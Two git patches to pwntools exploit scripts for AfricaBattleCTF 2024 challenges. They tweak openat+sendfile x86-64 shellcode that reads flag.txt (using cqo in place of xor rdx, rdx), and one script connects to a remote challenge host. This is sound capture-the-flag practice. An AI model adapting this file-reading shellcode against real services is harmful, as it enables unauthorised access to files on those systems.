From 8ba0d691c280977ab9ac974d34a2c6dbc6efc5e7 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Wed, 23 Oct 2024 14:14:56 +0000
Subject: [PATCH 1/2] learnt about the cqo instruction that sign-extends rax
 into rdx

---
 africabattlectf_2024/sweet_game/a.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/africabattlectf_2024/sweet_game/a.py b/africabattlectf_2024/sweet_game/a.py
index c7729eb..bbb8d07 100644
--- a/africabattlectf_2024/sweet_game/a.py
+++ b/africabattlectf_2024/sweet_game/a.py
@@ -26,9 +26,9 @@ r.sendlineafter(b": ", buf)
 
 # openat + sendfile
 shellcode="""
-lea rsi, [rdx+38]
+lea rsi, [rdx+37]
 mov edi, -100
-xor rdx, rdx
+cqo
 xor r10, r10
 add ax, 257
 syscall
@@ -43,4 +43,4 @@ shellcode = asm(shellcode)
 shellcode += b"flag.txt\0"
 r.sendlineafter(b": ", shellcode)
 
-r.interactive()
\ No newline at end of file
+r.interactive()

From 24121c97b342a9022abb521275864336d58f103f Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Wed, 23 Oct 2024 14:17:52 +0000
Subject: [PATCH 2/2] learnt about the cqo instruction that sign-extends rax
 into rdx

---
 africabattlectf_2024/universe/a.py          | 6 +++---
 africabattlectf_2024/universe/read_files.py | 4 ++--
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/africabattlectf_2024/universe/a.py b/africabattlectf_2024/universe/a.py
index 88a91fb..cda14fd 100644
--- a/africabattlectf_2024/universe/a.py
+++ b/africabattlectf_2024/universe/a.py
@@ -8,8 +8,8 @@ r = remote("challenge.bugpwn.com", 1004)
 
 # openat + sendfile
 shellcode="""
-lea rsi, [rdx+30]
-xor rdx, rdx
+lea rsi, [rdx+29]
+cqo
 xor r10, r10
 add ax, 257
 syscall
@@ -24,4 +24,4 @@ shellcode += b"/flag.txt\0"
 shellcode += b"\x90"*(4096-len(shellcode))
 r.sendline(shellcode)
 
-r.interactive()
\ No newline at end of file
+r.interactive()
diff --git a/africabattlectf_2024/universe/read_files.py b/africabattlectf_2024/universe/read_files.py
index e1223f6..3e01113 100644
--- a/africabattlectf_2024/universe/read_files.py
+++ b/africabattlectf_2024/universe/read_files.py
@@ -14,7 +14,7 @@ add r9, 0x4500
 mov r15, 0x2f
 push r15
 lea rsi, [rsp]
-xor rdx, rdx
+cqo
 xor r10, r10
 add ax, 257
 syscall
@@ -31,4 +31,4 @@ shellcode = asm(shellcode)
 shellcode += b"\x90"*(4096-len(shellcode))
 r.sendline(shellcode)
 
-r.interactive()
\ No newline at end of file
+r.interactive()